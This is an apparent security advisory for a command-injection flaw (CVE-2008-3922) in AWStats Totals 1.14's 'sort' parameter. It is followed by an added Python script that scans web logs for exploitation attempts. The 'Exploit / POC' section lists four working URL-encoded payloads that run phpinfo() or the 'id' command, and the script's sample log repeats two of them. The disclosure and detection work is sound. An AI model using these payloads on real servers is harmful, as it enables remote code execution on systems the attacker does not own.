AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
BID:30856
Info
| Bugtraq ID: | 30856 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-3922 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2008 12:00AM |
| Updated: | May 26 2011 05:31AM |
| Credit: | Elliot Kendall |
| Vulnerable: | Telartis AWStats Totals 1.14 |
| Not Vulnerable: | Telartis AWStats Totals 1.15 |
Discussion
AWStats Totals is prone to a vulnerability that attackers can leverage to execute arbitrary commands. The issue occurs because the application fails to adequately sanitize user-supplied input passed in the 'sort' parameter.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects AWStats Totals 1.14 and earlier versions.
Exploit / POC
The following example URIs are available. Note that these example URIs require that magic quotes be disabled, but will work on all versions of PHP.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
The following example URIs require a version of PHP that parses function calls inside strings (5+, some versions of 4?), but will work if magic quotes are enabled.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
The following exploit code is available:
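Both URI shapes above rely on the 'sort' value reaching the PHP interpreter as code rather than as a column name, so the defender-side check is the same one the application should have made: a sort key is a plain identifier and nothing else. The following added example (not code from the advisory or from the Telartis project) scans constructed web-server access-log lines for requests to awstatstotals.php, URL-decodes the 'sort' parameter once, and flags any value that is not a known column name; the allowlist of column names, the log format and the field names are assumptions made for the demonstration.

```python
"""Detection example for BID 30856: flag awstatstotals.php requests whose
'sort' parameter carries injected PHP instead of a column name.

Added example, not code from the advisory or from the Telartis project.
The log lines, the column-name allowlist and the finding fields are
constructed for this demonstration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of legitimate sort keys; the real column names used by
# AWStats Totals may differ, so unknown-but-harmless values get their own verdict.
ALLOWED_SORT = {"unique", "visits", "pages", "hits", "bandwidth"}

# A column name never contains quotes, brackets, braces, '$', parentheses or ';'.
# Both payload shapes on the page do: "]... breaks out of the string/index in the
# generated code, {${...}} abuses PHP's curly-brace interpolation.
SUSPICIOUS = re.compile(r'["\'\[\]{}$();]')

# Minimal Common Log Format parser (constructed; adjust to the real log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def classify_sort(value):
    """Classify one already URL-decoded 'sort' value."""
    if value in ALLOWED_SORT:
        return "ok"
    if SUSPICIOUS.search(value):
        return "injection"
    return "unknown"


def scan_log(lines):
    """Return one finding dict per request to awstatstotals.php whose 'sort'
    value is not a known column name."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("uri"))
        if not parts.path.endswith("awstatstotals.php"):
            continue
        # parse_qs percent-decodes each value exactly once, e.g. %22%5d -> "]
        for value in parse_qs(parts.query, keep_blank_values=True).get("sort", []):
            verdict = classify_sort(value)
            if verdict != "ok":
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "sort": value,
                    "verdict": verdict,
                })
    return findings


# Constructed sample log: two benign requests plus the two phpinfo() probe URIs
# from the advisory (the first needs magic quotes off, the second works with them on).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Aug/2008:10:01:12 +0000] "GET /stats/awstatstotals.php?sort=hits HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Aug/2008:10:02:40 +0000] "GET /stats/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22 HTTP/1.1" 200 61440',
    '203.0.113.9 - - [26/Aug/2008:10:03:01 +0000] "GET /stats/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 200 61440',
    '198.51.100.2 - - [26/Aug/2008:10:04:15 +0000] "GET /stats/awstatstotals.php?sort=visits HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} sort={f['sort']!r} -> {f['verdict']}")
```

Two points worth noting. The allowlist comparison is exactly the check that removes the vulnerability when done inside the application before the value is used; the scanner only reproduces it after the fact. And because parse_qs decodes once, a double-encoded payload would surface as "unknown" rather than "injection", so "unknown" findings deserve a look rather than being discarded.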
Solution / Fix
Solution:
Vendor fixes are available; please see the references for more information.
References
References:
- AWStats Totals Homepage (Telartis)
- Elliot Kendall: Multiple Vulnerabilities in AWStats Totals